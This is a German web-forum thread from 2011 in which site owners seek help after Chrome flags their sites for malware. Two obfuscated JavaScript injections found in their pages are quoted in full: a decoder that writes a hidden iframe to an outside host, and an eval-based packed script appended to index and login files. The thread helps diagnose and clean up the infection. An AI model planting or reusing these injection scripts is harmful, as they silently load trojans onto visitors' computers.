Server mit Malware infiziert?

Airfighter76 · 28.02.2011

Hi,
hab grad ein Problem und zwar zeigt mir meine Website mit Google Chrome eine Malware auf meinem Server an.

Warnung: Durch das Aufrufen dieser Website wird Ihr Computer möglicherweise beschädigt!
Die Website unter usf-xnova.de enthält Elemente der Website duveter.info, die anscheinend Malware hostet, also Software, die den Computer beschädigen oder anderweitig ohne Ihre Zustimmung agieren kann. Schon der Besuch einer Website, die Malware enthält, kann den Computer infizieren.

Ich hab die Vermutung, dass die Website duveter.info es irgendwie geschafft hat uns ihre Malware unterzuschieben, jedoch weis ich nicht wie das gehen soll. Bitte dringend um Hilfe.

fox99 · 28.02.2011

vielleicht wurde der seitenquelltext auf deinem server geändert, so das z.b. ein script oder iframe beim anzeigen der seite etwas von duveter.info nachladen will.

vielleicht wurde ein passwort gehackt oder du hast nicht sichere software auf dem server installiert. z.b. ein forum, wiki,... die das einschleusen von code ermöglicht.

Airfighter76 · 28.02.2011

Hey,
hab jetzt mal im Code geschaut und dabei was auffälliges gesehen, was in java-script programmiert wurde. Sagt mir pls was das ding genau macht.

Code:

<script language="JavaScript">
&lt;!--
function Decode(){var temp="",i,c=0,out="";var str="60&amp;105&amp;102&amp;114&amp;97&amp;109&amp;101&amp;32&amp;115&amp;114&amp;99&amp;61&amp;34&amp;104&amp;116&amp;116&amp;112&amp;58&amp;47&amp;47&amp;110&amp;117&amp;109&amp;101&amp;110&amp;100&amp;111&amp;46&amp;99&amp;111&amp;109&amp;47&amp;105&amp;110&amp;46&amp;99&amp;103&amp;105&amp;63&amp;51&amp;34&amp;32&amp;119&amp;105&amp;100&amp;116&amp;104&amp;61&amp;34&amp;49&amp;34&amp;32&amp;104&amp;101&amp;105&amp;103&amp;104&amp;116&amp;61&amp;34&amp;49&amp;34&amp;32&amp;102&amp;114&amp;97&amp;109&amp;101&amp;98&amp;111&amp;114&amp;100&amp;101&amp;114&amp;61&amp;34&amp;48&amp;34&amp;62&amp;60&amp;47&amp;105&amp;102&amp;114&amp;97&amp;109&amp;101&amp;62&amp;";l=str.length;while(c&lt;=str.length-1){while(str.charAt(c)!='&amp;')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//--&gt;
</script><script language="JavaScript">

the_viper · 28.02.2011

unter /body ist deine seite infiziert. es ist ein javascript das über dem DOM baum deine seite dazu bringt http://numendo.com/in.cgi?3 aufzurufen, dann java zu laden, dann
aufzurufen, was nach http://duveter.info/asdi7687rejkgasdtuyg/bwxqioyuenh.php?n=ftp springt, 2 exe dateien nachlädt, die einen trojaner starten.

ACHTUNG, nichts von diesen links ohne sandbox klicken!!!! trojaner!!!

lösung: du wurdest vermutlich per ftp lücke infiziert. es muss jemand im ftp log sehen, woher die ip's stammen und diese am besten per iptables blocken. ich hab diesen kack auf 3 rootserver mitgemacht, und 1und1 energisch mehrfach aufgefordert die ip's die ich rausgefunden hatte zu sperren auf den web-accounts meiner firma.
seiten saubermachen nicht vergessen!!!

hier dein infizierter part ganz unten im quelltext:

PHP:

</body>
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60&105&102&114&97&109&101&32&115&114&99&61&34&104&116&116&112&58&47&47&110&117&109&101&110&100&111&46&99&111&109&47&105&110&46&99&103&105&63&51&34&32&119&105&100&116&104&61&34&49&34&32&104&101&105&103&104&116&61&34&49&34&32&102&114&97&109&101&98&111&114&100&101&114&61&34&48&34&62&60&47&105&102&114&97&109&101&62&";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='&')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
</html>

Airfighter76 · 28.02.2011

Gut danke, ich hab jetzt meine ganzen daten gesafet und hab sie vom server gelöscht (FTP). Morgen schau ich mal in der FTP IP liste nach und lass die IP Sperren.

P.S. Könnt ihr mir den inhalt dieses Trojaners erklären, also was er macht?

cmddegi · 01.03.2011

Zumindest die Decode-Funktion ist nichts anderes als eine billige Verschleierung eines iframe-Links.
Man kann das Javascript etwas abändern und ausführen lassen, z.B. durch Eingabe in der Adresszeile des Browsers:

Code:

javascript:{var temp="",i,c=0,out="";var str="60&105&102&114&97&109&101&32&115&114&99&61&34&104&116&116&112&58&47&47&110&117&109&101&110&100&111&46&99&111&109&47&105&110&46&99&103&105&63&51&34&32&119&105&100&116&104&61&34&49&34&32&104&101&105&103&104&116&61&34&49&34&32&102&114&97&109&101&98&111&114&100&101&114&61&34&48&34&62&60&47&105&102&114&97&109&101&62&";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='&')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}alert(out);}

Das ruft die "Dekodier"-Routine direkt auf und gibt den Inhalt in einer Messagebox aus, anstatt ihn ins Dokument zu schreiben.

An der Stelle, an der Decode aufgerufen wird, wird dann mittels

Code:

document.write(out)

der Inhalt der Variable out eingefügt, der da lautet:

Code:

<iframe src="http://numendo.com/in.cgi?3" width="1" height="1" frameborder="0"></iframe>

Airfighter76 · 01.03.2011

Ok, dann wurde mit dem Code die Datei von der Website http://numendo.com/in.cgi?3 eingebettet. Was mach ich jetzt am besten? Ich hab ein Backup gemacht und alle Dateien gelöscht. Also nächstes will ich meine Passwörter ändern und die IP von dem Typen rausfinden. Nur was mach ich wenn ich die IP von dem Typen hab? Kann ich ihn dann irgendwie rechtlich noch belangen, oder geht das nicht?

the_viper · 01.03.2011

versuch das mal in z.b. china oder russland ... nee, aber den ip block in den iptables sperren, das macht eher sinn.

Airfighter76 · 01.03.2011

Wie meinst du das jetzt genau, hab sowas noch nie gemacht. Also ich würde jetzt ins FTP Protokoll von Filezilla schaun, und schaun welche IP drauf zugegriffen hat meine rausfiltern und schon hätt ich sie. Aber wie mach ich einen IP block?

the_viper · 01.03.2011

Code:

iptables -A INPUT -s dies.ist.die.ip/block -j REJECT

in die konsole, sofern es dein server ist. ansonsten den hoster bitten, das zu machen. wenn nein mit hosterwechsel winken.

Airfighter76 · 01.03.2011

Gut ist unser Server, muss dann freund drum bitten, das zu machen. Und nochmals ganz großes Dankeschön für die schnelle und vorallem sehr gute Hilfe ohne euch währ ich warscheinlich ziehmlich aufgeschmissen. Aber was mir noch nicht klar ist, wie ist er in unser Filezilla reingekommen? Braucht doch PW und Co? Und mit einem Bruteforce Angriff sollte sowas auch nicht allzu leicht sein. Und noch mal zum IP Block, die IP wird doch immer wieder geändert durch das aufbaun einer neuen Verbindung mit dem Internet.

the_viper · 01.03.2011

Zur ip: siehe hilfe zu iptables... Die ip tracen, um das land zu finden, dan am besten das ganze land blocken. Wenn es der server deines kollegen ist, weiß er was er tut, sonst sollte er besser keinen root besitzen.
Der angreifer ist höchstwahrscheinlich durch eine sicherheitslücke vom proftpd reingekommen, dafür braucht er kein passwort.

Airfighter76 · 01.03.2011

Ok und was mach ich jetzt am besten gegen diese Lücke?

fox99 · 01.03.2011

Nachschauen, ob in der aktuellen Version der Software die lücke noch existiert und entsprechend updaten oder eine andere FTP-Serversoftware einsetzen oder auf FTP ganz verzichten und z.B. auf SCP umsteigen.

Airfighter76 · 01.03.2011

Da eigentlich von unserer Seite nichts runtergeladen werden soll, auser mit Berechtigung, deshalb hab ich jetzt Anonymous-FTP ausgemacht. Hab jetzt nur noch Datensicherung und Wiederherstellung mit einem persönlichen FTP-Repository laufen, ist der Fehler den the_viper oben beschrieben hat gefixt?

RoboTom · 02.06.2011

Hallo zusammen,

ich habe das gleiche Problem und bin mittlerweile ziemlich verzweifelt. Das erste Mal hat es mich vor ca. 6 Monaten erwischt. Es wurden sämtliche index und login Dateien infiziert. Alle zur selben Zeit verändert. Ich habe damals die betroffenen Dateien gesäubert, FTP-Passwort geändert, Rechner kontrolliert (sauber). Nun in den letzten zwei Tagen gleich drei Mal derselbe Mist. Auf dem Server läuft ein phpLD Script (Linkverzeichnis). Keine Sicherheitslücken bis jetzt bekannt. Im Forum von Tausenden Nutzern keine einzige Meldung. Auch der Support von phpLD hat es bestätigt. Ich mache die Dateien sauber, ändere FTP-Passwort, kontrolliere den Rechner, scheint alles i.O. zu sein, und nach ein paar Stunden ist es wieder da. SmartFTP durch Filezilla ersetzt, hat auch nicht geholfen. Was mache ich denn jetzt? Wie komme ich auf FTP-Logs? Wie finde ich heraus, wie dieser Mist auf meinen Webspace kommt? Wäre echt super, wenn mir jemand weiter helfen könnte.

Hier ist der Code, der ans Ende der Dateien angehängt wird:

PHP:

<!-- ad --><script>var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar=" ?CdkywE:N}[ojui7tz5n;e)'.hsbf Tqr(<p]aBm2,lv/0gc{\">A1=";ar2="R0,0,60,56,4,16,-124,36,144,-136,104,-72,-8,-12,32,88,-100,-20,-40,144,-84,72,-72,-8,-12,40,48,-136,104,28,36,-152,116,8,-72,48,-40,16,-64,-36,8,76,-4,-48,140,-36,-56,104,-196,0,0,60,56,16,20,8,-72,44,4,-44,-8,-84,0,40,80,-32,84,-64,-20,32,76,-196,0,0,12,36,144,-136,104,-72,-8,-12,32,-76,108,-72,8,20,48,64,-60,-80,56,16,20,8,-72,32,-12,24,60,24,-120,8,-36,0,76,-112,148,0,-168,48,116,-24,40,-144,68,36,-52,92,0,-12,-28,-8,-64,100,-128,16,-48,108,64,-16,-24,-44,44,-20,-116,56,80,-8,-32,60,-72,44,-40,40,-140,76,136,-204,48,104,-100,12,20,24,-96,36,-48,56,36,112,-120,116,-28,-88,24,-16,-16,-28,128,-84,-36,148,-120,116,-28,-88,24,-12,-40,-48,152,-84,128,-120,80,-116,48,-48,52,-52,112,-112,8,-48,12,72,-44,-48,0,76,-8,4,60,-96,60,-48,8,-8,-12,32,-48,120,-40,-4,-60,124,-116,12,20,-4,88,-84,28,-48,-36,152,-100,-16,-20,96,-112,152,-100,12,108,-64,40,-120,56,16,20,8,-72,116,-4,-108,-8,-84,0,40,-40,0,116,-60,24,112,-124,-8,-12,32,40,-60,56,16,20,8,-72,44,4,-44,104,-196,0,0,176,-24,-20,-12,-4,4,96,-96,-108,36,144,-136,104,-72,-8,-12,32,92,-60,-44,64,-84,20,-60,144,-84,72,-72,-8,-12,68,-40,-36,56,16,20,8,-72,8,-4,-8,32,-16,8,-20,-20,140,-140,0,64,-72,52,-56,12,20,48,-40,12,24,60,-96,72,-72,8,-36,0,76,-112,148,0,-168,48,116,-24,40,-144,68,36,-52,92,0,-12,-28,-8,-64,100,-128,16,-48,108,64,-16,-24,-44,44,-20,-116,56,80,-8,-32,60,-72,44,-40,40,-140,76,136,-204,48,104,-100,12,20,-4,-8,32,-16,8,-40,-48,152,-84,12,76,-116,48,-48,52,-52,112,-112,8,-48,196,-120,8,-44,-48,0,76,-8,16,-12,32,-16,8,-40,-48,152,-84,12,44,-96,60,-48,8,-8,-12,32,136,-120,56,-40,-4,-60,124,-116,12,20,8,-12,32,-16,8,-40,-48,152,-84,12,72,-84,28,-48,148,-120,88,-88,-12,32,-16,8,-40,-48,152,-84,12,-32,-20,96,72,-120,88,-88,-12,32,-16,8,-20,-20,140,-140,0,64,-72,52,-56,12,20,48,-40,-72,36,-48,56,36,-8,72,-72,116,-28,-88,-4,-8,32,-16,8,-20,-20,140,-140,0,64,-72,52,-56,12,20,48,-40,8,-16,-28,128,-84,-36,28,72,-72,116,-28,-88,-4,-8,-84,0,0,12,36,144,-136,104,-72,-8,-12,32,88,-100,-20,-40,144,-84,72,-72,-8,-12,40,48,-136,104,28,36,-152,116,8,-72,48,-40,16,-64,-36,8,76,-4,-48,140,-36,-48,52,-8,0,-56,-8,-68,-4,96,-44,112,-160,124,-20,-24,-8,-84,0,40]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement("div");el.innerHTML="ReferenceErr";yes=true;},1);</script><!-- /ad -->

haiko · 02.06.2011

RoboTom schrieb:
... kontrolliere den Rechner, scheint alles i.O. zu sein ...

wie und womit kontrollierst du den rechner?

RoboTom · 02.06.2011

Malwarebytes, NOD32, HijackThis

Vor einer Stunde die nächste Infizierung. Bin schon wieder am Säubern :be:

Juliet · 02.06.2011

meine Meinung dazu:
Warum betreibst du einen server der nicht zum Inet abgesichert ist mit realtime virenscanner und Malware schutz ? selber schuld.

Lemmy · 02.06.2011

Juliet schrieb:
meine Meinung dazu:
Warum betreibst du einen server der nicht zum Inet abgesichert ist mit realtime virenscanner und Malware schutz ? selber schuld.

Wo du recht hast hast du recht.
Minimum Windows Firewall.

@Robotom

Ich glaube dein Virenscanner kannste vergessen, der erkennt auch nicht alles.
Du solltest zusätzlich mal einen Check mit : http://www.mcafee.com/us/downloads/free-tools/how-to-use-stinger.aspx durchführen.

Server mit Malware infiziert?

Airfighter76

fox99

Airfighter76

the_viper

Airfighter76

cmddegi

Airfighter76

the_viper

Airfighter76

the_viper

Airfighter76

the_viper

Airfighter76

fox99

Airfighter76

RoboTom

haiko

RoboTom

Juliet

Lemmy

Server mit Malware infiziert?

ANGEBOTE & SPONSOREN

Neueste Beiträge

Statistik des Forums